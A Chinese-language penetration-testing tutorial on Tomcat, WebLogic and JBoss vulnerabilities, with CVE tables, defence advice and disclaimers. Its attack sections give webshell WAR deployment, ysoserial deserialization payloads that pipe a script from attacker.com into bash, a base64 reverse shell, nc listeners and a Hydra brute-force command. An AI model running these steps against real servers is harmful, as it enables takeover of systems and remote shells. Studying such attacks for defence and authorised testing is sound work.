本文僅用于技術研究,禁止用于非法用途。
Author:枷鎖
文章目錄
- 什么是中間件
- 中間件漏洞
- (1) Tomcat
- (2) Weblogic
- (3) JBoss漏洞
什么是中間件
中間件(Middleware)是指一種軟件組件,其作用是在不同的系統、應用程序或服務之間傳遞數據和消息。它通常位于應用程序和操作系統之間,負責在不同的應用程序之間傳遞數據、協調不同應用程序之間的通信,以及處理網絡請求等。
中間件就像計算機系統的"萬能管家",在操作系統和應用軟件之間架起橋梁,既當翻譯協調溝通,又跑腿傳遞數據,還包辦各種雜務,讓開發者能專注核心業務。?
中間件通常是一種插件式架構,允許開發人員將其集成到現有的應用程序中。它可以提供諸如身份驗證、授權、緩存、負載均衡、日志記錄、安全性等功能,以簡化應用程序的開發和部署過程。
從廣義上講,中間件涵蓋了從 Web 服務器,到身份驗證系統,再到消息傳遞工具等一切內容。
從另個一角度來講,中間件是:jboss、weblogic、tomcat、apache等。中間件的使用可以提高應用程序的可擴展性、可靠性、可維護性和安全性。
中間件漏洞
中間件漏洞是指在中間件軟件中存在的安全漏洞,這些漏洞可能被攻擊者利用來對系統進行攻擊和滲透。中間件漏洞通常包括以下幾種:
- 代碼注入漏洞:攻擊者可以通過向中間件發送惡意代碼,從而執行任意代碼或獲取敏感數據。
- 跨站腳本漏洞:攻擊者可以通過在中間件輸出的網頁中插入惡意腳本,來竊取用戶信息或進行其他惡意行為。
- SQL注入漏洞:攻擊者可以通過在中間件輸入的SQL查詢中插入惡意代碼,從而執行任意SQL查詢或獲取敏感數據。
- 認證和授權漏洞:攻擊者可以利用中間件的認證和授權機制的漏洞,來繞過訪問控制,獲取系統權限。
- 文件包含漏洞:攻擊者可以利用中間件的文件包含功能,來包含惡意文件并執行任意代碼。
為了保護中間件的安全,開發人員需要采取一系列安全措施,如開發安全代碼、定期更新中間件、限
制訪問權限、配置防火墻等。此外,使用漏洞掃描工具可以幫助開發人員及時發現和修復中間件漏
洞
(1) Tomcat
Tomcat是一個開源的Java Servlet容器,由Apache軟件基金會開發。它可以作為獨立的Web服務器或應用服務器,也可以作為其他Web服務器的插件來使用,如Apache HTTP Server。Tomcat支持Java Servlet、JavaServer Pages(JSP)、Java Expression Language(EL)和WebSocket等Java技術,并提供了許多企業級特性,如集群、安全性和可擴展性。
A. Tomcat密碼爆破到WAR包部署
- 部署WAR包
WAR(Web Application Archive)是一種Web應用程序的打包格式,用于將Web應用程序打包成一個 單獨的文件,便于部署和分發。WAR文件實際上是一種JAR(Java Archive)文件,其中包含了Web應用程序的全部內容,包括Java類、HTML、JSP、Servlet、XML配置文件、靜態資源(如圖片、CSS、JavaScript文件等)等。WAR文件還可以包含一些特定于Web應用程序的配置文件,例如 web.xml、context.xml等。
WAR文件通常是通過Web服務器部署的,例如Tomcat、Jetty等。在部署Web應用程序時,Web服務器會將WAR文件解壓縮并將其部署到指定的目錄中,然后啟動Web應用程序。通過將Web應用程序打包成WAR文件,可以方便地將應用程序部署到不同的Web服務器中,也可以方便地將應用程序分發給其他人使用。
制作war包
將jsp馬添加到壓縮文件,然后將壓縮文件的zip后綴修改為war
webshell路徑: ip:port/war包名字/文件名
ip:port/war包名字/文件名
(2) Weblogic
WebLogic Server 是美國甲骨文( Oracle )公司開發的一款適用于云環境和傳統環境的應用服務中間件,確切的說是一個基于JavaEE 架構的中間件,它提供了一個現代輕型開發平臺,用于開發、集成、部署和管理大型分布式Web 應用、網絡應用和數據庫應用的Java 應用服務器。將Java 的動態功能和Java Enterprise 標準的安全性引入大型網絡應用的開發、集成、部署和管理之中。
Weblogic特征
默認端口:7001
Web界面:Error 404--Not Found
控制后臺:http://ip:7001/console
Weblogic歷史漏洞
漏洞主要影響版本:
10.3.6.0
12.1.3.0
12.2.1.1
12.2.1.2
12.2.1.3
14.1.1.0
WebLogic反序列化漏洞詳解
一句話概括:
WebLogic反序列化漏洞是指攻擊者通過構造惡意的序列化數據,利用WebLogic服務器對Java反序列化的不當處理,實現遠程代碼執行(RCE),從而控制目標服務器。
1. 漏洞原理
(1) 什么是序列化與反序列化?
- 序列化(Serialization):將Java對象轉換為字節流(便于存儲或傳輸)。
- 反序列化(Deserialization):將字節流還原為Java對象。
(2) 漏洞成因
WebLogic在處理某些Java對象(如T3
、IIOP
協議傳輸的數據)時,未嚴格檢查反序列化數據的安全性,導致攻擊者可以構造惡意數據,觸發服務器執行任意代碼。
關鍵點:
- T3協議:WebLogic默認使用的RMI通信協議,傳輸數據時自動反序列化。
- Java反序列化漏洞:攻擊者利用
ObjectInputStream
的反序列化機制,加載惡意類(如InvokerTransformer
、CommonsCollections
鏈)。
2. 常見WebLogic反序列化漏洞
漏洞編號 | 影響版本 | 利用方式 | 核心利用鏈 |
---|---|---|---|
CVE-2015-4852 | WebLogic 10.3.6.0, 12.1.2.0 | T3協議反序列化 | CommonsCollections1 |
CVE-2016-0638 | WebLogic 10.3.6.0, 12.1.3.0 | T3協議反序列化 | CommonsCollections3 |
CVE-2016-3510 | WebLogic 10.3.6.0, 12.1.3.0 | IIOP協議反序列化 | |
CVE-2017-3248 | WebLogic 10.3.6.0, 12.1.3.0 | JRMP反序列化 | |
CVE-2018-2628 | WebLogic 10.3.6.0, 12.1.3.0 | T3協議反序列化 | |
CVE-2019-2725 | WebLogic 10.3.6.0, 12.1.3.0 | wls9-async組件 | |
CVE-2020-2555 | WebLogic 12.2.1.3.0 | IIOP協議反序列化 |
3. 漏洞利用方式
(1) 攻擊流程
- 探測目標:掃描WebLogic默認端口(7001)是否開放。
- 構造Payload:使用
ysoserial
生成惡意序列化數據(如CommonsCollections
鏈)。 - 發送Payload:通過T3/IIOP協議發送惡意數據,觸發反序列化漏洞。
- 執行命令:成功RCE后,執行
whoami
、curl
等命令,獲取Shell。
(2) 常用工具
- ysoserial:生成反序列化Payload(
java -jar ysoserial.jar CommonsCollections1 "curl http://attacker.com/shell.sh | bash"
)。 - WebLogicScan:自動化漏洞檢測(
python weblogicScan.py -u http://target:7001
)。 - BurpSuite:手動構造T3協議請求,發送Payload。
4. 漏洞復現(以CVE-2018-2628為例)
步驟1:環境搭建
docker pull vulhub/weblogic:10.3.6.0
docker run -d -p 7001:7001 vulhub/weblogic:10.3.6.0
步驟2:生成Payload
java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS80NDQgMD4mMQ==}|{base64,-d}|{bash,-i}" > payload.bin
步驟3:發送Payload
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("target_ip", 7001))
with open("payload.bin", "rb") as f:s.send(f.read())
s.close()
步驟4:獲取反彈Shell
nc -lvnp 4444
5. 漏洞防御
(1) 臨時緩解
- 禁用T3協議(適用于非集群環境):
# 修改WebLogic配置文件 <protocol>T3</protocol> <enabled>false</enabled>
- 升級補丁:Oracle官方已發布修復版本(如10.3.6.0.210315)。
(2) 長期防護
- WAF攔截:過濾T3/IIOP協議中的惡意Payload。
- 最小權限運行:WebLogic服務使用低權限賬戶(非
root
)。 - 網絡隔離:限制WebLogic端口(7001)僅允許內網訪問。
6. 總結
- 漏洞本質:WebLogic對T3/IIOP協議的反序列化未做安全校驗。
- 利用方式:通過
ysoserial
構造惡意Payload,觸發RCE。 - 防御關鍵:禁用T3協議、升級補丁、網絡隔離。
(3) JBoss漏洞
JBoss漏洞詳解
一句話概括:
JBoss(現稱 WildFly)是一款基于Java EE的開源應用服務器,由于默認配置不安全、反序列化漏洞等問題,常被黑客攻擊,導致遠程代碼執行(RCE)、敏感信息泄露等風險。
1. JBoss常見漏洞類型
漏洞類型 | 漏洞編號 | 影響版本 | 利用方式 |
---|---|---|---|
JMX Console未授權訪問 | CVE-2007-1036 | JBoss 4.x | 直接訪問/jmx-console 部署惡意WAR包 |
反序列化漏洞 | CVE-2015-7501 | JBoss 5.x/6.x | 利用JMXInvokerServlet 執行任意代碼 |
EJBInvokerServlet漏洞 | CVE-2013-4810 | JBoss 4.x/5.x | 通過EJB接口上傳惡意代碼 |
JMS反序列化漏洞 | CVE-2017-7504 | JBoss 4.x | 利用JBossMQ 組件執行命令 |
管理后臺弱口令 | - | 所有版本 | 爆破admin/admin 等默認賬號 |
2. 漏洞利用實戰
(1) JMX Console未授權訪問(CVE-2007-1036)
漏洞原理:
JBoss的/jmx-console
頁面默認無權限控制,攻擊者可直接訪問并部署惡意WAR包,獲取服務器控制權。
攻擊步驟:
- 探測目標:訪問
http://target:8080/jmx-console
,確認是否未授權訪問。 - 制作WAR木馬:
jar -cvf shell.war shell.jsp # 將JSP木馬打包成WAR
- 遠程部署:
- 進入
jmx-console
→ 搜索flavor=URL,type=DeploymentScanner
- 在
void addURL()
方法中填入WAR包地址(如http://attacker.com/shell.war
) - 點擊
Invoke
部署,訪問http://target:8080/shell/shell.jsp
獲取WebShell。
- 進入
(2) JBoss反序列化漏洞(CVE-2015-7501)
漏洞原理:
JMXInvokerServlet
未對反序列化數據做安全檢查,攻擊者可構造惡意Java對象,觸發RCE。
攻擊步驟:
- 生成Payload(使用
ysoserial
):java -jar ysoserial.jar CommonsCollections1 "curl http://attacker.com/shell.sh | bash" > payload.bin
- 發送Payload:
curl -X POST --data-binary @payload.bin http://target:8080/invoker/JMXInvokerServlet
- 獲取反彈Shell:
nc -lvnp 4444
(3) JBoss管理后臺弱口令攻擊
漏洞原理:
JBoss默認賬號admin/admin
、admin/password
等易被爆破,登錄后可上傳WAR木馬。
攻擊步驟:
- 爆破密碼(使用
Hydra
):hydra -l admin -P passlist.txt target http-form-post "/jboss-console/login.do:j_username=^USER^&j_password=^PASS^&login=Login:Invalid"
- 登錄后臺 → 進入
Web Application (WAR)
→ 上傳shell.war
。 - 訪問
http://target:8080/shell/shell.jsp
執行命令。
3. 漏洞防御方案
(1) 臨時修復
- 禁用JMX Console:
<!-- 修改$JBOSS_HOME/server/default/deploy/jmx-console.war/WEB-INF/jboss-web.xml --> <security-domain>java:/jaas/jmx-console</security-domain>
- 刪除危險組件:
rm -f $JBOSS_HOME/server/default/deploy/http-invoker.sar
- 修改默認密碼:
# 修改$JBOSS_HOME/server/default/conf/props/jmx-console-users.properties admin=NewStrongPassword!
(2) 長期防護
- 升級到WildFly:JBoss已更名為WildFly,建議遷移至最新版本。
- 網絡隔離:限制JBoss端口(8080、9990)僅內網訪問。
- WAF防護:攔截惡意反序列化數據(如
java.rmi.server
關鍵字)。
4. 總結
- 高危漏洞:JBoss因默認配置松散,易被未授權訪問/反序列化攻擊。
- 利用方式:通過
jmx-console
部署WAR、JMXInvokerServlet
反序列化、弱口令爆破。 - 防御關鍵:禁用危險接口、升級版本、強密碼策略。
?? 免責聲明:本文僅用于安全研究,禁止非法滲透測試!
宇宙級免責聲明??
🚨 重要聲明:本文僅供合法授權下的安全研究與教育目的!🚨
1.合法授權:本文所述技術僅適用于已獲得明確書面授權的目標或自己的靶場內系統。未經授權的滲透測試、漏洞掃描或暴力破解行為均屬違法,可能導致法律后果(包括但不限于刑事指控、民事訴訟及巨額賠償)。
2.道德約束:黑客精神的核心是建設而非破壞。請確保你的行為符合道德規范,僅用于提升系統安全性,而非惡意入侵、數據竊取或服務干擾。
3.風險自擔:使用本文所述工具和技術時,你需自行承擔所有風險。作者及發布平臺不對任何濫用、誤用或由此引發的法律問題負責。
4.合規性:確保你的測試符合當地及國際法律法規(如《計算機欺詐與濫用法案》(CFAA)、《通用數據保護條例》(GDPR)等)。必要時,咨詢法律顧問。
5.最小影響原則:測試過程中應避免對目標系統造成破壞或服務中斷。建議在非生產環境或沙箱環境中進行演練。
6.數據保護:不得訪問、存儲或泄露任何未授權的用戶數據。如意外獲取敏感信息,應立即報告相關方并刪除。
7.免責范圍:作者、平臺及關聯方明確拒絕承擔因讀者行為導致的任何直接、間接、附帶或懲罰性損害責任。
🔐 安全研究的正確姿勢:
? 先授權,再測試
? 只針對自己擁有或有權測試的系統
? 發現漏洞后,及時報告并協助修復
? 尊重隱私,不越界
?? 警告:技術無善惡,人心有黑白。請明智選擇你的道路。
希望這個教程對你有所幫助!記得負責任地進行安全測試。